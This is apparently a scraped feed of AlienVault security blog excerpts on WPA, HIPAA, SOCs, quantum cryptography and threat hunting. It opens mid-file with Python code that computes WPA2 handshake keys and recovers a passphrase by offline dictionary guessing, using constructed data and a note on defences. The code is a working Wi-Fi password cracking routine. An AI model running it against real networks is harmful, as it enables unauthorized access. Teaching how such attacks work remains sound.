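    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK plus the handshake's addresses and nonces (sorted, per the standard)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(ptk, eapol_frame):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    kck = ptk[:16]  # the first 128 bits of the PTK are the key confirmation key
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed handshake material (not a real capture).
SSID = "CoffeeShop"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"anonce-seed").digest()
SNONCE = hashlib.sha256(b"snonce-seed").digest()
# Placeholder EAPOL-Key frame for message 2 with the MIC field zeroed (not a faithful encoding).
EAPOL_M2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 16 + SNONCE + b"\x00" * 40

WORDLIST = ["password", "letmein", "coffee2020", "espresso!", "Tr0ub4dor&3"]  # constructed


def make_handshake(passphrase):
    """What the sniffer ends up with: the MIC on message 2 (the other fields are sent in clear)."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    ptk = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk, EAPOL_M2)


def crack(captured_mic, wordlist):
    """Offline guessing: recompute the MIC per candidate; the AP is never contacted again."""
    for candidate in wordlist:
        if hmac.compare_digest(make_handshake(candidate), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    captured = make_handshake("coffee2020")   # the network's (weak) passphrase
    print("recovered passphrase:", crack(captured, WORDLIST))
```

The 4096 PBKDF2 iterations are the only thing slowing the attacker down, and they were chosen for 2004-era hardware; the practical defence on WPA2 is a long random passphrase, and the structural fix is WPA3's SAE.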
But WPS (WiFi Protected Setup) is a part of WPA2 technology that was made to make using WiFi easier with certain devices. Without getting into too much technical jargon, cyber attackers found a way to bypass WPA2 encryption through WPS. If WPA2 is the most recent standard your devices can use, you should definitely choose it. WPA2 is much more secure than unencrypted WiFi or WEP.
What is WPA3 and what are the benefits for enterprises?
So it took fourteen years after the debut of WPA2 for its successor to arrive. But by 2018, WPA3 was announced. There were exploits against WPA2 like KRACK that won’t work against WPA3. In general, WPA3
2020-06-29T11:00:00+00:00 https://feeds.feedblitz.com/~/629106908/0/alienvault-blogs~WPA-security-explained-what-is-WiFi-Protected-Access www.secnews.physaphae.fr/article.php?IdArticle=1779874 False None None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
SD-WAN security explained
2020-06-26T03:59:00+00:00 https://feeds.feedblitz.com/~/628859350/0/alienvault-blogs~SDWAN-security-explained www.secnews.physaphae.fr/article.php?IdArticle=1775590 False None None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
HIPAA in the time of Covid-19
Portability and Accountability Act (HIPAA), which is a regulation to safeguard a patient’s healthcare information from impermissible or unauthorized use and disclosure. Healthcare providers cannot make an individual’s information public without their written consent, unless it is critical for the public’s protection or the patient’s treatment. In the case of Covid-19, where HIPAA regulation may limit what can be shared about a patient, it may create difficulty for public health agencies trying to trace recent contacts and the possible spread of the virus. At the same time, sharing information such as the names of Corona-positive cases can also lead to unwanted attention and harassment.
In light of the current pandemic, the Office of Civil Rights (OCR), the body responsible for the enforcement of HIPAA, has issued notices regarding the relaxation of some of the HIPAA requirements to allow health practitioners to focus their resources on patient care. Though these requirements have not been suspended due to Covid-19, violating some of them while the pandemic lasts will not lead the subject to face non-compliance issues. Let us look at some of the HIPAA requirements relaxed during the time of Covid-19.
Telehealth
In view of social distancing, healthcare providers treating their patients via telehealth will not be subject to any penalty for violating HIPAA rules. Doctors using video or audio communication to provide telehealth services can use any non-public-facing audio or video device for communicating with patients, irrespective of security precautions. This discretion applies to telehealth consultations provided for all sorts of treatments, not only for treating corona patients. Doctors and healthcare professionals can, therefore, use web and mobile apps using internet services such as Excede Internet, and conduct non-public-facing chats using Facebook Messenger, FaceTime, Skype, or Google Hangouts without the risk of penalty for being noncompliant with HIPAA rules. OCR has also stated that such health care providers will not be penalized for not having a Business Associate Agreement with these application vendors.
First responders
The OCR has issued guidelines to help first responders receive the Protected Health Information (PHI) of corona-infected or exposed individuals. The guidelines clarify how first responders may disclose the minimum required PHI, such as names or other identification, to paramedics, law enforcement, or other first responders in cases where they are required to take precautions or wear personal protective equipment.
This can be done in situations such as when it is necessary to treat a patient, when the law requires it, for notifying a public health authority, when first responders are at risk of infection, and for preventing or reducing an impending health and safety hazard. However, under no circumstances are health authorities allowed to make this information publicly available.
Business associates
OCR will not impose a penalty on healthcare providers and their business associates for violating certain HIPAA provisions where the intention is good faith and the disclosure of Public Health Information is for the sake of public health activities. This discretion aims to support health oversight agencies and public health authorities, state emergenc
2020-06-25T11:00:00+00:00 https://feeds.feedblitz.com/~/628742408/0/alienvault-blogs~HIPAA-in-the-time-of-Covid www.secnews.physaphae.fr/article.php?IdArticle=1773532 False Guideline None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Managed security operations center (SOC) explained
2020-06-23T17:33:00+00:00 https://feeds.feedblitz.com/~/628645610/0/alienvault-blogs~Managed-security-operations-center-SOC-explained www.secnews.physaphae.fr/article.php?IdArticle=1771873 False Threat None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
What quantum cryptography means for cybersecurity
cybersecurity is at a tipping point, they argue, and photonic computers are already being deployed to break PGP encryption; it is now time to arm ourselves with systems that match those being deployed against us. In this article, we'll look at the emerging field of quantum cryptography, and at quantum key distribution (QKD) in particular. We'll then explain what the emergence of these technologies means for the average cybersecurity analyst.
The threat of quantum computers By now, most of us are aware of the fundamental details of quantum computing, and what it could mean for the safety of commonly used public-key cryptographic protocols. In short, quantum computers can factorize large integers much, much more quickly than traditional computing architectures, and this means that decrypting the 1024-bit keys used by the RSA encryption protocol (for instance) will take a quantum computer a few hours, rather than the years the same process would take on today’s computers. At the moment, no such decryption attacks have been seen in the wild, and the perceived reality is that it may take decades before quantum computers have the necessary computing power to be used in this way. Nevertheless, given the reliance of many modern systems on such algorithms, researchers are already looking at ways to protect against this kind of attack. What is quantum cryptography? Some of the proposed solutions are essentially extensions of existing cryptographic schemes. NIST, for instance, is already recommending that organizations use 2048-bit RSA encryption as a minimum, and that this standard be used for everything from encrypted cloud storage to encrypted email services. Similarly, some analysts argue that extant protocols like TLS can be improved to combat the threat of quantum decryption algorithms. Others are exploring the concept of lattice cryptography, which appears to be uncrackable even by quantum computers. The most exciting area of present research, however, relies on using the power of quantum computers to encrypt data, and therefore protect it against even quantum-enabled attacks. This is where the idea of quantum key distribution (QKD) comes in. QKD is built on the system of public key exchange that underpins familiar public-key cryptographic systems, but also makes use of the strange properties of individual photons. 
The systems being explored at the moment are deployed on standard fiber optic cables, but instead of using them to send a data signal, individual photons are sent. Because these individual photons are entangled with photons being held in the sender’s system
2020-06-23T11:00:00+00:00 https://feeds.feedblitz.com/~/628498566/0/alienvault-blogs~What-quantum-cryptography-means-for-cybersecurity www.secnews.physaphae.fr/article.php?IdArticle=1770543 False Threat None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
3 Steps to better cybersecurity in touchless business solutions (part 1 of 3)
This blog was written by an independent guest blogger. The current pandemic that has upended our lives and wreaked havoc across the world has also humbled countries to a shocking degree. As borders closed, so did major sectors, industries, and businesses. Brick-and-mortar establishments had to cease operations and resume their business remotely to comply with quarantine measures. As conditions get better, the next challenge is for governments to restore both lives and livelihoods. Businesses are now preparing strategies and solutions on how to get safely back to work while complying with quarantine guidelines released by policymakers and preserving both their workforce and customers. All the countries that kept their economy going followed rigorous physical distancing rules, aside from other measures to contain transmission chains. These countries give hope that getting back to a “new normal” is indeed possible, even if we do not yet see an end to this global tragedy. The demand for social distancing is hastening our transition to a more digital economy. Businesses need to streamline their operations, automate, and integrate touchless solutions to minimize human touch and prevent contamination.
But heightened automation and touchless technology also call for more robust cybersecurity systems to prevent fraud, data breaches, and attacks. This is a 3-part series discussing ways to improve cybersecurity in touchless business solutions, with recommended preventive measures against cyber attacks that keep both businesses and clients secure.
Practice extra caution in cashless payment solutions.
Because of the severity of the virus attack on individuals, many establishments in different countries have banned cash payments altogether. Debit/credit card payments were made touchless manually, with cashiers letting consumers swipe their own cards on the PED, which is then cleaned and sanitised after every use. But a more straightforward way to go touchless is to go cashless, with the use of E-wallet payment systems and payment apps. An E-wallet is an app that lets you store money and transfer it directly to your bank account, so you can use your mobile to shop and pay for items by scanning a QR code. The E-wallet can be connected directly to a consumer’s debit/credit account. The more cautious consumer can also top up or load just the cash they need onto their E-wallet before making any transaction. No matter what system consumers use, every part of the sale is digital, from payment to receipts. Even for microbusinesses in small communities, cashless payment is still possible through online payment apps.
Risks in cashless payment solutions
● Smishing attacks
Smishing is a kind of phishing attack where someone tricks you into giving up your credentials through a phone call or SMS message. It has become a significantly growing threat in the world of online security. The pandemic only encouraged hackers to intensify their smishing efforts. Untrusted apps and phishing SMSes are giving cyber attackers full access to consumers’ phones and e-payments.
For instance, a hacker can send a phishing SMS disguised as c
2020-06-22T11:00:00+00:00 https://feeds.feedblitz.com/~/628351082/0/alienvault-blogs~Steps-to-better-cybersecurity-in-touchless-business-solutions-part-of www.secnews.physaphae.fr/article.php?IdArticle=1770246 False Threat None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Benefits of a security operations center (SOC)
Cyberattacks triggered over 7,000 breaches in 2019, exposing 15.1 billion records
The average cost of a data breach is now $3.92M
It takes an average of 279 days to identify and contain a breach.
86% of organizations rate the SOC as anywhere from important to essential to their cybersecurity strategy
5 goals of any modern SOC
1. Reduce time to response
One of the top goals of a modern SOC is to accelerate the pace at which security analysts can detect signs of an attack, investigate the associated activity, and start remediation to shut down the threat. The less time cyber attackers have to poke around unrestricted on organizational systems, the less opportunity they have to break into high-value assets and steal sensitive information.
2. Minimize breach impact
Everything a SOC does comes down to minimizing the impact of breaches and other risks to the organization. The SOC's work on cutting down attack dwell time (the time before detection) helps minimize breach impact. So does effective prioritization of SOC activity based on factors like the severity of vulnerabilities in an asset, threat intelligence about attack trends, and the business criticality of an asset. Effective SOCs can make all the difference in keeping minor security incidents from becoming a major breach.
3. Increase security visibility
SOC operators understand that the more they know about their systems, the easier it will be to identify attacks against them.
SOCs seek to expand security visibility and incident response coverage by establishing thorough inventories of their organizational IT assets and instrumenting near-real-time security monitoring to be ready to alert when threats strike.
4. Stay a step ahead of attackers
SOCs aim to move beyond reactive incident response and strive to evolve their activities to include proactive threat hunting. The stealthiest attackers work hard to avoid detection, which is why veteran SOC analysts sift through digital clues to find early evidence of attacks that may not always trigger alarms but are nevertheless worth investigating.
5. Keep business informed of risk
The final goal of the SOC is to keep up with reporting an
2020-06-18T20:31:00+00:00 https://feeds.feedblitz.com/~/628025448/0/alienvault-blogs~Benefits-of-a-security-operations-center-SOC www.secnews.physaphae.fr/article.php?IdArticle=1770247 False Data Breach,Threat,Guideline None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Why right now is the best time to assess your cyber response to COVID-19
free resources that make it easy to ad
2020-06-18T11:00:00+00:00 https://feeds.feedblitz.com/~/627966408/0/alienvault-blogs~Why-right-now-is-the-best-time-to-assess-your-cyber-response-to-COVID www.secnews.physaphae.fr/article.php?IdArticle=1770248 False Vulnerability,Guideline None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
The challenge to security for the new normal
As states begin to lift shelter-in-place orders and businesses reopen their doors, there is a lot of speculation as to what “the new normal” will look like. And so far, there are still more questions than answers for those of us working from home. When is it safe to return to work? Will we have to run at reduced occupancy? What if cases of COVID-19 spike again or return in the fall? Is it even necessary to return to the office when employees can work from home?
None of us have a crystal ball to accurately predict when we will return to our cubicles, but if anything, this global event has made it abundantly clear that business continuity relies heavily on enabling employees to work from virtually anywhere. On the surface, this may seem like a fairly simple task. The majority of workers have some sort of mobile device, whether it be a laptop or smart phone, as well as internet access. A lot of us have already been working remotely at least part of the time prior to the pandemic. But for technology teams that are tasked with supporting the work from home initiative, the solution may be a lot more complex. Not only must they solve for access at scale, but visibility and security as well. The first major hurdle for supporting a remote workforce is providing access to the applications and data they require to conduct business. Most organizations have deployed some form of VPN for this purpose, but few have built it with the intention of supporting all of their workers connecting simultaneously. As a result, they are finding that their VPNs are getting overwhelmed and users are experiencing latency or trouble connecting to the network altogether. Employees may attempt to resolve the VPN connectivity or latency issue by just connecting to the Internet directly to accomplish whatever work is possible without accessing the network and by using unsanctioned web-based applications. It’s also very possible that they, or other members of their household, may even use their company owned devices for purposes completely unrelated to work. And when traffic isn’t routed to the data center, businesses operating on a hub and spoke model lose visibility as well as their ability to enforce security policy. Without these guardrails, the possibility of a security incident becomes more likely as employees freely surf the net, click links, and download files without the analysis provided by a perimeter security device. 
Organizations could certainly respond to these challenges by expanding the capacity of their VPN concentrator. If employees are able to easily access assets hosted on the network and the Internet through the VPN without performance concerns, they are a lot more likely to connect to it as a habit when they begin their work day. But this approach still relies on voluntary action on the part of the remote worker and isn’t really the most efficient way for employees to access applications and data hosted in the cloud. Another consideration is that although many VPNs provide similar visibility and security controls to next-generation firewalls, a lot of organizations are still managing both products, using separate user interfaces to protect their on-site and remote users. Businesses that want future-ready security and to maintain visibility across users, during the pandemic and beyond, should give strong consideration to a cloud-based security solution that does not rely on backhauling traffic to the data center for enforcement. Security hosted in the cloud means fewer appliances to purchase and manage, but it can also help provide the flexibility that is desperately needed during this time of uncertainty by following users virtually anywhere they conduct business. There are a lot of point products on the market that can solve the challenge of providing zero-trust ne
2020-06-17T11:00:00+00:00 https://feeds.feedblitz.com/~/627827946/0/alienvault-blogs~The-challenge-to-security-for-the-new-normal www.secnews.physaphae.fr/article.php?IdArticle=1770249 False Malware None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Cybersecurity for small business supply chain management
Image Source: Pexels
Small businesses are significant contributors to the economy. According to the U.S. Small Administration, they generate approximately 44% of the gross domestic product (GDP) in the U.S.
However, small to medium enterprises (SMEs) are also frequently more vulnerable to the threats of our contemporary digital landscape. Small businesses that utilize the supply chain have frequently been subject to risks, as their vetting processes for vendors and partners may be less stringent than those of larger businesses. But as the implementation of and reliance upon technology has grown, cybersecurity has become one of the most significant issues for even small businesses. Supply chain management consists of many moving parts and is therefore often subject to various points of vulnerability. For small businesses, if these are mismanaged, cybercriminals have the potential to cause serious damage. We’re going to take a look at some of the key cybersecurity risks that small businesses face. How can leaders manage these risks more effectively, and what tools are at their disposal?
The risks
Cybersecurity is a prevalent threat in almost every industry. Some are more attractive targets than others, either due to a greater prospect of reward for the criminal or the presence of weaker system protections. Few are immune to risk. However, small businesses utilizing the supply chain are subject to some specific areas of vulnerability, including:
Partners. Small businesses are not always able to own or operate every step of their supply chain. This means that they are often reliant upon partners to handle essential elements such as logistics or the supply of raw materials. While these relationships are positive for all concerned, there is a risk present in inconsistent cybersecurity protections across partners. If one link in the chain doesn’t have sufficient system protections, this can present the risk of a breach to all companies it is connected to and even expose customers themselves.
Software. Small businesses are unlikely to utilize their own proprietary software solutions and must engage software as a service (SaaS) providers, or outsource their infrastructural needs.
While this can be a useful option for many SMEs, leaders are trusting that these third-party vendors are operating robust cybersecurity protocols and providing sufficient protection for data collection, sharing, and storage.
Digital Assets. Small businesses in the supply chain must understand that their physical assets are not the only aspects that make them a target. Customer data, operating practices, and financial information can all attract unwanted attention from cybercriminals. Even specific intellectual property, down to the business model, that is unique to your business needs to be protected. Making certain that your company has taken out the correct patents and copyright precautions is an excellent start. However, it's worth remembering that these digital elements are valuable, and therefore a potential point of vulnerability.
Solutions
Most of us already have some b
2020-06-16T11:00:00+00:00 https://feeds.feedblitz.com/~/627620742/0/alienvault-blogs~Cybersecurity-for-small-business-supply-chain-management www.secnews.physaphae.fr/article.php?IdArticle=1770250 False Tool,Vulnerability,Threat,Guideline None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Cybersecurity in education: Securing schools as they transition to online learning
more vulnerable targets to cyberattacks. Schools are finding themselves outmatched as these threats intensify. Parents likewise need to learn about and ensure safe cybersecurity practices for their kids, and would therefore also benefit from learning about the security methods that we are about to cover. In this article, we’ll discuss how school technology leaders can develop the necessary strategies to protect against and mitigate breaches by procuring technology, developing risk management policies, and planning for incidents before they occur.
Why Are Schools At Risk of Cyber Attacks?
In the face of the COVID-19 pandemic, the focus and attention of most of the cybersecurity community have been on protecting government institutions, the airline industry, and the healthcare industry from hackers. This is good, but educational institutions are at just as much risk from malicious hackers as the above industries and organizations are. If anything, this risk has only increased significantly due to the record numbers of students who are now attending school via online learning platforms, video conferences, and e-learning environments. In the United States, the Federal Bureau of Investigation has warned extensively about the greatly increased cybersecurity risks of teleconferencing and online classrooms. The FBI specifically cites examples of malicious cybercriminals delivering threatening content to Zoom classroom calls (colloquially referred to as Zoom-bombing), which has even resulted in numerous school districts pulling out of Zoom and seeking alternative platforms. This highlights a larger issue of schools and school districts using technology that has either not been properly vetted or that educators and students are not prepared to use safely. In other words, even as school districts turn to alternative teleconferencing options besides Zoom, they can still be at major risk of falling prey to hackers and cybercriminals.
This leads us to our next question: what exactly can school districts and educational inst
2020-06-15T11:00:00+00:00 https://feeds.feedblitz.com/~/627516638/0/alienvault-blogs~Cybersecurity-in-education-Securing-schools-as-they-transition-to-online-learning www.secnews.physaphae.fr/article.php?IdArticle=1768813 False Malware,Vulnerability,Guideline Deloitte None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Bluetooth security risks explained
2020-06-11T11:00:00+00:00 https://feeds.feedblitz.com/~/626876940/0/alienvault-blogs~Bluetooth-security-risks-explained www.secnews.physaphae.fr/article.php?IdArticle=1761425 False Spam None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Are airports and airlines prepared for cyber threats post COVID-19?
have been hit hard and forced into a dire financial situation. It’s very likely that going forward, airports will be forced to implement stricter screening before permitting boarding, in addition to needing more government bailouts and loans to stay afloat. But one of the more overlooked areas where airline companies and airports have been hit hard during the coronavirus pandemic is cybersecurity and data privacy. It’s very typical of hackers to take advantage of major crises to spread malware, steal company and customer data, and cause chaos. Unfortunately, the current crisis has been no different. As airports and airline companies work together to devise strategies on how to properly re-open, an Assure cybersecurity audit model has been created in conjunction with Crest to help strengthen cybersecurity for the aviation industry in general. Specifically, the Assure scheme aims to enable the aviation industry to better manage its cybersecurity risks without compromising aviation safety or resilience.
In this article, we’ll explore the current cyber threats that airports and airlines are facing, how prepared they are to meet those threats, and how exactly the Assure model could benefit the aviation industry in general.
Why is cybersecurity an issue for the airline industry?
Cybersecurity is a fundamental issue for the airline industry because airlines are incredibly vulnerable to cyberattacks. One reason for this is the large number of wireless devices that almost all modern airliners utilize. These include in-flight entertainment systems (IFEC), electric flight bags (EFBs), IoT devices intended to automate repairs or increase fuel efficiency, and any other Wi-Fi connectivity systems installed on the plane. In other words, each individual airplane has numerous targets that cybercriminals can go after to gain access to systems and any data stored within them. It’s not much better at airports, and if anything, airports are actually more vulnerable than airplanes are. According to the Airports Council International (ACI), addressing cybersecurity concerns needs to be a core priority for airports as they attempt to resume normal business operations.
Specifically, the ACI urges airports to utilize a common information-sharing approach, secure connectivity with cloud-based virtual private servers, secure IT infrastructure for remote access, and teach
2020-06-10T11:00:00+00:00 https://feeds.feedblitz.com/~/626688266/0/alienvault-blogs~Are-airports-and-airlines-prepared-for-cyber-threats-post-COVID www.secnews.physaphae.fr/article.php?IdArticle=1759351 False Malware,Threat None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Fireside chat: cybersecurity thought leadership
2020-06-09T11:00:00+00:00 https://feeds.feedblitz.com/~/626566586/0/alienvault-blogs~Fireside-chat-cybersecurity-thought-leadership www.secnews.physaphae.fr/article.php?IdArticle=1757589 False Ransomware,Threat None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Stories from the SOC - detecting network anomalies with OTX
Open Threat Exchange™ (OTX®). After a carefully curated analysis of the activity at hand was presented to the customer, we worked closely with their IT personnel to remediate the concerning behavior and implement safeguards to help prevent similar occurrences.
Investigation
Initial Alarm Review
Indicators of Compromise (IOCs)
The initial alarm surfaced as the result of egress traffic to the OTX IOC 222[.]186[.]19[.]221, an IOC found in several OTX pulses with the designation of ‘Actively Malicious’.
Figure 1 - Initial Alarm
Expanded Investigation
Alarm Detail
During our preliminary analysis, we suspected this behavior to be an attempt to create a VPN through the client’s firewall to ultimately connect to a malicious host. Upon further review, we determined that the nature of these egress attempts implied the possibility of a compromised system. Following the completion of our reconnaissance efforts, we presented our actionable information to the customer and requested their consent to continue our efforts.
After reviewing the investigation, the customer was quick to respond and requested guidance on how to proceed with employing a firewall rule to prevent further outbound traffic. Given the limitations of their experience with firewall policies, we provided relevant documentation for ‘geo-blocking’ the origin country of the IOC.
Figure 2 - Analyst Recommendation
After equipping our client with the necessary guidance to execute our suggested course of action, the customer informed us of their proposed next steps. At this juncture, we acknowledged the customer’s response and concluded the investigation.
Persistent Alarms
Shortly after the closing of the initial investigation, alarms similar to those first examined began to recur. Considering the potential implications of persistent behavior of this nature, we made the conscious decision to re-open and continue our investigative efforts. The newly generated alarm varied slightly from the others in that the most recent activity appeared to be a Remote Desktop Protocol (RDP) connection attempt. Though the customer had enforced firewall blacklisting on ingress traffic, we conveyed our recommendation to block outbound traffic as well.
Response
Building the investigation
Bearing in mind the RDP activity, we decided to do a complete port scan of the customer asset in question in order to provide actionable insight with greater granularity.
Figure 3 - Asset Scan Results
Based on the results of the asset scan, we provided additional recommended actions to the customer.
Tapping 15 years of sysadmin experience, we were also able to describe industr
2020-06-08T13:00:00+00:00 https://feeds.feedblitz.com/~/626471480/0/alienvault-blogs~Stories-from-the-SOC-detecting-network-anomalies-with-OTX www.secnews.physaphae.fr/article.php?IdArticle=1756162 False Threat None None
AlienVault Blog - AlienVault is a major defense actor in IOCs
Keeping kids safe online
Set Content & Privacy Restrictions
Google Play (Android): Set up parental controls on Google Play
Google Chrome: Change site permissions
Parents and guardians can purchase age-appropriate devices, such as the Amazon Fire Kids Edition, the Samsung Galaxy Kids, and the PBS Playtime Pad.
What about Social Media?
Sites like Facebook, Twitter, Snapchat, TikTok, and Instagram are very popular. What precautions exist there? The social media platforms include information on privacy and security settings that can make their platforms safer for children. Unfortunately, these settings are not as front and center as they should be. Provided below are links to the security, privacy, and parental control sections of:
Facebook: Messenger Kids Settings
Twitter: Control Your Twitter Experience
TikTok: Family Safety Mode and Screen Time Management
Instagram: Tips for Parents
Snapchat: Safety & Education
The official minimum age to use many social media sites is thirteen. But parents of children of all ages should be on their guard. Trolls, predators, bullies, and cyber criminals use social media as a tool for harassment and worse. The most important thing you can do to protect kids online is to teach them awareness: not to share personal information.
For example, location, school, full name, age, social security number (if they know it), or tele
2020-06-04T11:00:00+00:00
https://feeds.feedblitz.com/~/626081364/0/alienvault-blogs~Keeping-kids-safe-online
www.secnews.physaphae.fr/article.php?IdArticle=1750091

AlienVault Blog - AlienVault is a major defense actor in IOCs
Stories from the SOC - SSH Brute Force Authentication Attempt

Expanded Investigation

Events Search

When searching for additional events, we started by reviewing all failed login activity from the external host to see if any events were not captured in the alarm. Initially, there were twenty-five events associated with the alarm, one for each of the user accounts involved in this attack. Upon further review, we uncovered a total of sixty-two events, with multiple events per user. Each event was a failed login attempt that generated an “Invalid User” error.

Event Deep Dive

The attacker was using a system with an IP address from a foreign country to target the customer’s server (possibly a bastion host, given its name). This foreign IP is listed as a scanning IP according to the Open Threat Exchange™. The user IDs seemed very explicit, indicating that the attacker potentially had access to a list of user IDs (via a phishing attempt or other compromise) and was trying to replicate them to gain access to an internal system. We looked into the usernames to determine if there was any additional activity involving them, but there was none outside of the incident in question.

Reviewing for Additional Indicators

We expanded our search to try to determine an additional point of entry or other IOCs which may be related to this incident; however, we were unable to discover any. At this point the activity appeared to be a brute force attack from a known malicious host.

Response

Building the Investigation

Given the urgency of the situation, we created a high-severity investigation.
Utilizing the capabilities of the USM platform, the technology that underpins the AT&T Managed Threat Detection and Response service, we generated a CSV report for the customer, detailing the event activity we observed so they could have visibility into the events and the evolving situation. After attaching our report, we developed our notes to the customer with an analysis of what we observed, recommendations for what to do, and reference material for the indicators.

SOC recommendations document

Customer Interaction

The customer responded by agreeing with the analyst assessment that this was indeed an SSH brute force attempt. The customer blocked the foreign IP address for inbound and outbound connections to prevent future compromise attempts. The usernames were ultimately revealed to be invalid, so no further attempts were made to root cause how the attacker generated the list.
2020-06-03T11:00:00+00:00
https://feeds.feedblitz.com/~/625971134/0/alienvault-blogs~Stories-from-the-SOC-SSH-Brute-Force-Authentication-Attempt
www.secnews.physaphae.fr/article.php?IdArticle=1748002

AlienVault Blog - AlienVault is a major defense actor in IOCs
Threat hunting explained

Microsoft, an attacker resides on a compromised network a median time of 146 days before being discovered, making this kind of attack an advanced persistent threat (APT). In this amount of time, attackers residing on a network in stealth can exfiltrate data, access applications to identify and use business details to commit fraud, or laterally move through a network gathering credentials for access to even more valuable data and resources.

Why is threat hunting necessary?

Organizations implementing good security practices and tools such as antivirus, email and web scanning, firewalls, etc. are taking the necessary first steps. A layered security strategy can be effective in stopping the majority of cyberattacks.
However, it should be assumed that some small percentage of advanced attacks will evade detection by traditional security solutions, giving cyber criminals access to an organization’s network for as long as they deem necessary to carry out their malicious activities. Because of the potential risk, it’s this small percentage of attacks that can spur an organization to participate in threat hunting.

Implementing a security posture that prevents and detects attacks is defensive in nature – the idea is to stop an attack before it happens. Threat hunting is a predictive and offensive tactic, based on the assumption that an attacker has already successfully gained access (despite an organization’s best efforts). Threat hunting uses a mixture of forensics capabilities and threat intelligence to track down where attackers have established footholds within the network and eliminate their access before any damaging malicious actions can take place.

Threat hunting and indicators of compromise (IoCs)

Threat hunting generally begins with security analysts working through threat intelligence, their understanding of the environment they secure, and other security data sources to postulate about a potential threat. Threat hunters then look for indicators of compromise (IoCs) found in forensic “artifacts” to identify threatening activity that aligns with the hypothesized threat activity. These artifacts are bits of data from server logs, network traffic, configurations, and more that help threat hunters determine if suspicious activities have taken place. Artifacts include:

Network-based artifacts – Monitoring listening ports of internet-facing systems, threat hunters can monitor traffic as well as look through packet session recordings, looking for unusual outbound traffic, abnormal communication geographies, irregular amounts of inbound or outbound data, etc.
Host-based artifacts – Changes in file systems and the Windows registry are two places threat hunters can find anomalous settings and content. Scanning registry values and monitoring changes made to file systems are common threat hunting activities.

Authentication-based artifacts – Monitoring or reviewing the logins (or attempted logins) of privileged accounts on endpoints, servers, and services can be useful for a threat hunter to follow the trail used by an attacker and identify which accounts have been compromised and need to be remediated.
2020-06-02T11:00:00+00:00
https://feeds.feedblitz.com/~/625857202/0/alienvault-blogs~Threat-hunting-explained
www.secnews.physaphae.fr/article.php?IdArticle=1745930

AlienVault Blog - AlienVault is a major defense actor in IOCs
Top Cybersecurity threats For seniors

There are around 39.5 million people in the U.S. aged over 65, and a high percentage of them, particularly women (nearly 40%), live alone. Living alone makes seniors more reliant on technology, which can be a savior (think Zoom, Skype and other communication-centered technology) as well as a threat (from phishing to fake antivirus software and bitcoin scams). Are seniors more vulnerable to cybersecurity threats, and if so, what can be done to reduce their risks?

Are Seniors More Vulnerable To Online Scams?

You may be surprised to learn that millennials are actually more vulnerable to online threats than seniors. A Federal Trade Commission report shows that “40 percent of adults age 20-29 who have reported fraud ended up losing money in a fraud case” (only 18% of adults aged 70+ are affected). However, the median loss for seniors is significantly higher - $1,092 compared to $400 in the 20-29 age group.

Common Cybersecurity Threats For Seniors

Cyber criminals often use psychological strategies to attack the elderly.
Many retirees have nest eggs that are targeted by fraudsters in ways that prey on specific vulnerabilities. Research published in the journal PLOS One showed that older internet users had almost twice the chance of being victimized by phishing attacks as younger users (53.46% compared to 26.37%). Criminals can also prey on a senior’s loneliness, using dating and romance scams, selling ‘medications’ and inviting users to donate to false charities. Fake websites abound with hidden charges or non-existent products. Finally, overly simple or repeated passwords or PINs can be cracked in a matter of minutes.

Helping Seniors Stay Safe

Trust in scammers sometimes ensues because seniors feel unsafe in their homes. Family members can help by creating a safe environment in which smart home systems boost accessibility and security. Seniors who are able to communicate needs and concerns to family members, make requests regarding their needs, and learn to use technology such as voice assistants can be more empowered against scammers trying to abuse their disabilities or vulnerabilities. Family members living far from senior loved ones can also ensure that seniors have access to video call software, especially if they are deaf or mute and use sign language to communicate. The more secure a senior feels in terms of mobility, communication and security, the more likely they are to discuss proposed purchases of software, devices and other items with family members. This sense of safety can help seniors avoid the impulsive purchases or email responses that arise when people are in a state of panic or fear.

Cybersecurity Awareness

In addition to helping seniors install antivirus software and firewalls, it is important to help family members or clients raise awareness about common types of scams and red flags. For instance, pop-up windows, warnings of a virus and computer issues, and typical phishing email scams should be pointed out to seniors.
Equally vital is informing seniors of the dangers of logging into bank and other private accounts through a link. The safe way, of course, is for seniors to directly enter into their financ
2020-06-01T11:00:00+00:00
https://feeds.feedblitz.com/~/625757290/0/alienvault-blogs~Top-Cybersecurity-threats-For-seniors
www.secnews.physaphae.fr/article.php?IdArticle=1744113

AlienVault Blog - AlienVault is a major defense actor in IOCs
Explain how VPN works

HTTPS, SSH, NNTPS, and LDAPS. So assuming that everything involved is working properly, if you use those ports over a VPN connection, your data is encrypted at least twice! PCs, smartphones, tablets, dedicated servers, and even some IoT devices can be endpoints for a VPN connection. Most of the time your client will need to use a VPN connection application. Some routers also have built-in VPN clients.

